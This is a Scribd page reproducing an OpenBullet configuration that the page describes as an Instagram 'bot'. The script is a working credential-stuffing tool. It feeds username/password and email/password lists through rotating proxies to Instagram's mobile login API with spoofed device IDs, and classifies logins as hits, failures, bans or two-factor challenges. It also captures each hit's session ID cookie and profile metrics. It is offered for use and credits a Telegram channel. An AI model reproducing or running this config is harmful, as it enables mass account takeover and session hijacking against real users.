0% found this document useful (0 votes)
157 views2 pages

Instagramm

This document contains Instagram bot settings and scripts to log into an Instagram account, check for login challenges, and parse profile data like followers, following, posts from the profile page. It defines settings like suggested bots, plugins, and script actions to make login requests, handle responses, and extract profile metrics.

Uploaded by

cacca
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
157 views2 pages

Instagramm

This document contains Instagram bot settings and scripts to log into an Instagram account, check for login challenges, and parse profile data like followers, following, posts from the profile page. It defines settings like suggested bots, plugins, and script actions to make login requests, handle responses, and extract profile metrics.

Uploaded by

cacca
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

[SETTINGS]

{
"Name": "instagram",
"SuggestedBots": 100,
"MaxCPM": 0,
"LastModified": "2023-10-19T21:41:46.2923786+03:30",
"AdditionalInfo": "Telegram Channel : t.me/OpenBulletChannel | Capture | CPM
Rate: 200 - 2000",
"RequiredPlugins": [],
"Author": "@TheOwn",
"Version": "1.2.2",
"SaveEmptyCaptures": false,
"ContinueOnCustom": false,
"SaveHitsToTextFile": false,
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": true,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 50,
"BanProxyAfterGoodStatus": true,
"BanLoopEvasionOverride": -1,
"EncodeData": false,
"AllowedWordlist1": "UserPass",
"AllowedWordlist2": "MailPass",
"DataRules": [],
"CustomInputs": [],
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"QuitOnBanRetry": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}

[SCRIPT]
#GET REQUEST GET "https://i.instagram.com/api/v1/accounts/login/"

HEADER "User-Agent: Instagram 64.0.0.11.97 Android (21/5.0.2; 240dpi; 540x886;


LGE/lge; LG-D618; g2mds; g2mds; pt_BR)"

#Token PARSE "<COOKIES(csrftoken)>" LR "" "" -> VAR "Token"

#Encode FUNCTION URLEncode "{\"_csrftoken\":\"<Token>\",\"adid\":\"bbe5bcdb-b1e3-


4815-9e3b-
9265c0740970\",\"country_codes\":\"[{\\\"country_code\\\":\\\"1\\\",\\\"source\\\":
[\\\"default\\\"]}]\",\"device_id\":\"android-
af34247cf7b374c2\",\"google_tokens\":\"[]\",\"guid\":\"064020d6-330c-471d-a7b2-
fc1774dc7122\",\"login_attempt_count\":0,\"password\":\"<PASS>\",\"phone_id\":\"824
595cb-7bf9-4b40-8075-685df82e23cc\",\"username\":\"<USER>\"}" -> VAR "Encode"

#POST REQUEST POST "https://i.instagram.com/api/v1/accounts/login/"


CONTENT
"signed_body=fd5f359e5560870ec4cdc326850186a0ebc0033465fdd7477d727e6bae6d575e.<Enco
de>&ig_sig_key_version=4"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Instagram 64.0.0.11.97 Android (21/5.0.2; 240dpi; 540x886;
LGE/lge; LG-D618; g2mds; g2mds; pt_BR)"

#Check KEYCHECK
KEYCHAIN Success OR
KEY "logged_in_user"
KEY "checkpoint_challenge_required"
KEYCHAIN Failure OR
KEY "bad_password"
KEY "invalid_user"
KEY "unusable_password"
KEY "\"Invalid Parameters\""
KEYCHAIN Ban OR
KEY "rate_limit_error"
KEY "ip_block"
KEYCHAIN Retry OR
KEY "sentry_block"
KEYCHAIN Custom "CUSTOM" OR
KEY "two_factor_required"

#Chal PARSE "<SOURCE>" JSON "error_type" -> VAR "Chal"

#Login PARSE "<SOURCE>" LR "{\"" "\": {\"pk\":" -> VAR "Log"

#Challenge FUNCTION Translate


KEY "checkpoint_challenge_required" VALUE "Yes"
KEY "logged_in_user" VALUE "No"
"<Chal><Log>" -> CAP "Challenge"

REQUEST GET "https://www.instagram.com/<USER>/?next=%2F"

HEADER "Host: www.instagram.com"


HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/109.0"
HEADER "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/
*;q=0.8"
HEADER "Accept-Language: en-US,en;q=0.5"
HEADER "Accept-Encoding: gzip, deflate, br"
HEADER "Connection: keep-alive"
HEADER "Upgrade-Insecure-Requests: 1"
HEADER "Sec-Fetch-Dest: document"
HEADER "Sec-Fetch-Mode: navigate"
HEADER "Sec-Fetch-Site: none"
HEADER "Sec-Fetch-User: ?1"

#Followers PARSE "<SOURCE>" LR "<meta content=\"" " Followers," -> CAP "Followers"

#Following PARSE "<SOURCE>" LR "Followers, " " Following," -> CAP "Following"

#Posts PARSE "<SOURCE>" LR "Following, " " Posts " -> CAP "Posts"

#private PARSE "<SOURCE>" LR "\"is_private\":" "," -> VAR "private"

#Private FUNCTION ToUppercase "<private>" -> CAP "Private"

#SessionID FUNCTION Constant "<COOKIES(sessionid)>" -> CAP "SessionID"

#CC FUNCTION Constant "t.me/TheOwn" -> CAP "Configed By : "

You might also like